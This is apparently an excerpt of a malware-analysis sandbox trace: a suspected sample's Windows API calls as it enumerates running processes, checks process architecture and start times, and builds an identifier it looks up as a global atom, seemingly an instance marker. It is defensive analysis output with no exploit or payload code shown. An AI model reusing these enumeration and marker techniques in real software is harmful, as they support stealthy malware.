	[0127.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.080] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.080] CloseHandle (hObject=0x2dc) returned 1
	[0127.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.080] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.080] CloseHandle (hObject=0x2dc) returned 1
	[0127.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0127.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.081] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.081] CloseHandle (hObject=0x2dc) returned 1
	[0127.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.081] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.081] CloseHandle (hObject=0x2dc) returned 1
	[0127.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.082] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.082] CloseHandle (hObject=0x2dc) returned 1
	[0127.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.082] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.082] CloseHandle (hObject=0x2dc) returned 1
	[0127.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.083] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.083] CloseHandle (hObject=0x2dc) returned 1
	[0127.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.083] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.083] CloseHandle (hObject=0x2dc) returned 1
	[0127.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.083] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.084] CloseHandle (hObject=0x2dc) returned 1
	[0127.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.084] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.084] CloseHandle (hObject=0x2dc) returned 1
	[0127.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.084] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.084] CloseHandle (hObject=0x2dc) returned 1
	[0127.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.085] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.085] CloseHandle (hObject=0x2dc) returned 1
	[0127.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.085] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.085] CloseHandle (hObject=0x2dc) returned 1
	[0127.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0127.085] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.086] CloseHandle (hObject=0x2dc) returned 1
	[0127.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0127.086] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.086] CloseHandle (hObject=0x2dc) returned 1
	[0127.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.086] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.086] CloseHandle (hObject=0x2dc) returned 1
	[0127.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.087] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.087] CloseHandle (hObject=0x2dc) returned 1
	[0127.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.087] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.087] CloseHandle (hObject=0x2dc) returned 1
	[0127.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.088] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.088] CloseHandle (hObject=0x2dc) returned 1
	[0127.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.088] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.088] CloseHandle (hObject=0x2dc) returned 1
	[0127.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.089] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.089] CloseHandle (hObject=0x2dc) returned 1
	[0127.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.089] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.089] CloseHandle (hObject=0x2dc) returned 1
	[0127.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0127.089] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.090] CloseHandle (hObject=0x2dc) returned 1
	[0127.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.090] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.090] CloseHandle (hObject=0x2dc) returned 1
	[0127.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.090] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.090] CloseHandle (hObject=0x2dc) returned 1
	[0127.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.091] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.091] CloseHandle (hObject=0x2dc) returned 1
	[0127.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.091] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.091] CloseHandle (hObject=0x2dc) returned 1
	[0127.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.091] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.091] CloseHandle (hObject=0x2dc) returned 1
	[0127.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0127.092] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.092] CloseHandle (hObject=0x2dc) returned 1
	[0127.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0127.092] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.092] CloseHandle (hObject=0x2dc) returned 1
	[0127.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.093] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.094] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0127.094] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.094] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.095] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.096] GetLastError () returned 0x5
	[0127.097] GetLastError () returned 0x5
	[0127.097] GetLastError () returned 0x5
	[0127.097] GetLastError () returned 0x5
	[0127.097] GetLastError () returned 0x5
	[0127.097] GetLastError () returned 0x5
	[0127.097] GetLastError () returned 0x5
	[0127.097] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.097] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0127.097] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.097] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0127.097] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0127.097] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0127.107] CloseHandle (hObject=0x2dc) returned 1
	[0127.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0127.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.107] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.107] CloseHandle (hObject=0x2dc) returned 1
	[0127.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.108] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.108] CloseHandle (hObject=0x2dc) returned 1
	[0127.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.108] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.108] CloseHandle (hObject=0x2dc) returned 1
